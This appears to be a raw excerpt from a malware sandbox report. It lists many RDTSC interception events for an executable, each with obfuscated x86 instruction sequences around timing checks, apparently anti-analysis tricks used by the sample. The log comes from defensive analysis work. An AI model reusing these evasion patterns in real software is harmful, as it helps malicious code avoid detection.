Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117CE01 second address: 117CE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117CFBD second address: 117CFC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117CFC3 second address: 117CFC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117CFC9 second address: 117CFED instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD6F84FD816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jne 00007FD6F84FD81Eh 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117CFED second address: 117CFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117D155 second address: 117D15D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117D414 second address: 117D418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117D418 second address: 117D41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 117DAEC second address: 117DB21 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD6F84FEE7Bh 0x00000008 jmp 00007FD6F84FEE75h 0x0000000d pushad 0x0000000e js 00007FD6F84FEE66h 0x00000014 jmp 00007FD6F84FEE6Fh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1182998 second address: 11829A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD6F84FD816h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11829A3 second address: 11829C5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD6F84FEE68h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 jmp 00007FD6F84FEE6Eh 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11829C5 second address: 11829EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jg 00007FD6F84FD818h 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11829EA second address: 1182A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD6F84FEE73h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1182A02 second address: 1182A0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FD6F84FD816h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1182C6B second address: 1182C75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD6F84FEE66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11488B3 second address: 11488B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 118ACE6 second address: 118ACFC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD6F84FEE6Dh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 118F0AC second address: 118F123 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FD6F84FD818h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 add esi, dword ptr [ebp+122D3471h] 0x00000028 jmp 00007FD6F84FD823h 0x0000002d call 00007FD6F84FD819h 0x00000032 jmp 00007FD6F84FD825h 0x00000037 push eax 0x00000038 jbe 00007FD6F84FD81Ah 0x0000003e push edi 0x0000003f push edi 0x00000040 pop edi 0x00000041 pop edi 0x00000042 mov eax, dword ptr [esp+04h] 0x00000046 push esi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 118FC00 second address: 118FC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 118FC04 second address: 118FC0E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD6F84FD816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 118FCFA second address: 118FD10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD6F84FEE72h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 118FF72 second address: 118FF76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 119009B second address: 11900A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD6F84FEE66h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11900A6 second address: 11900AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11900AC second address: 11900B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 119010D second address: 119014B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FD6F84FD818h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 add si, 146Dh 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b jl 00007FD6F84FD81Ch 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 119014B second address: 119014F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11905CC second address: 11905D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD6F84FD816h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1190EC6 second address: 1190ECD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1190DB8 second address: 1190DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1190ECD second address: 1190EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FD6F84FEE66h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1190EDF second address: 1190EF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD6F84FD820h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1190EF3 second address: 1190F04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD6F84FEE6Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 119347D second address: 1193481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 119405D second address: 11940D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FD6F84FEE68h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 jmp 00007FD6F84FEE6Dh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007FD6F84FEE68h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000017h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+122D1A19h] 0x0000004b mov dword ptr [ebp+122D2921h], ebx 0x00000051 push 00000000h 0x00000053 mov dword ptr [ebp+122D2654h], eax 0x00000059 push eax 0x0000005a pushad 0x0000005b je 00007FD6F84FEE68h 0x00000061 pushad 0x00000062 popad 0x00000063 push eax 0x00000064 push edx 0x00000065 jp 00007FD6F84FEE66h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1194BC3 second address: 1194C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 add dword ptr [ebp+1244D3A6h], edx 0x0000000f push 00000000h 0x00000011 movsx edi, cx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FD6F84FD818h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push ebx 0x00000031 and esi, 482C411Dh 0x00000037 pop edi 0x00000038 push eax 0x00000039 push eax 0x0000003a pushad 0x0000003b push ecx 0x0000003c pop ecx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 114538C second address: 114539D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD6F84FEE66h 0x0000000a ja 00007FD6F84FEE66h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 114539D second address: 11453A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FD6F84FD816h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11453A9 second address: 11453AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 119A911 second address: 119A917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 119A917 second address: 119A91B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 119BEB4 second address: 119BF2E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD6F84FD81Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FD6F84FD818h 0x00000012 pop edx 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FD6F84FD818h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D2E65h] 0x00000034 call 00007FD6F84FD828h 0x00000039 mov ebx, dword ptr [ebp+12444F61h] 0x0000003f pop ebx 0x00000040 push 00000000h 0x00000042 mov dword ptr [ebp+1244770Ch], ebx 0x00000048 push 00000000h 0x0000004a mov edi, dword ptr [ebp+124563B4h] 0x00000050 push eax 0x00000051 push edi 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 114D929 second address: 114D92E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 119F7C4 second address: 119F7C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11A082D second address: 11A083E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FD6F84FEE6Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11A1761 second address: 11A176B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11A176B second address: 11A1777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11A1777 second address: 11A177C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11A0906 second address: 11A0916 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11A0916 second address: 11A091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11A48EC second address: 11A490C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD6F84FEE73h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11A3A30 second address: 11A3A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11A5810 second address: 11A582B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD6F84FEE6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007FD6F84FEE79h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11A69B4 second address: 11A69B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11A69B8 second address: 11A69D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD6F84FEE78h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11A69D4 second address: 11A6A03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D17BFh], edx 0x00000011 push 00000000h 0x00000013 mov di, si 0x00000016 push 00000000h 0x00000018 movsx ebx, bx 0x0000001b mov ebx, dword ptr [ebp+122D36A4h] 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 jc 00007FD6F84FD818h 0x00000029 push edi 0x0000002a pop edi 0x0000002b push eax 0x0000002c push edx 0x0000002d push ecx 0x0000002e pop ecx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11A7932 second address: 11A793C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD6F84FEE6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11A897A second address: 11A898F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD6F84FD818h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11A8AAF second address: 11A8AB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11AA822 second address: 11AA826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11AA826 second address: 11AA84E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD6F84FEE77h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11AAA51 second address: 11AAA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11AF603 second address: 11AF60D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD6F84FEE6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11B3B89 second address: 11B3B8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11B3B8F second address: 11B3B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11B3B95 second address: 11B3B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11B3B99 second address: 11B3BAD instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD6F84FEE66h 0x00000008 ja 00007FD6F84FEE66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11B3BAD second address: 11B3BBE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FD6F84FD816h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11B3BBE second address: 11B3BC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11B3BC2 second address: 11B3BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD6F84FD816h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007FD6F84FD827h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11B3443 second address: 11B3447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11B3447 second address: 11B3463 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD6F84FD826h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11B3768 second address: 11B3781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FD6F84FEE70h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11B3781 second address: 11B3787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11B3787 second address: 11B378B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11C330F second address: 11C3368 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD6F84FD82Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FD6F84FD821h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jnl 00007FD6F84FD82Dh 0x0000001a mov eax, dword ptr [eax] 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11C3368 second address: 11C3378 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11C3378 second address: 11C337D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11C34D4 second address: 11C34D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11C34D8 second address: 11C34E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FD6F84FD816h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11436FA second address: 1143700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1143700 second address: 114372D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD6F84FD816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD6F84FD829h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
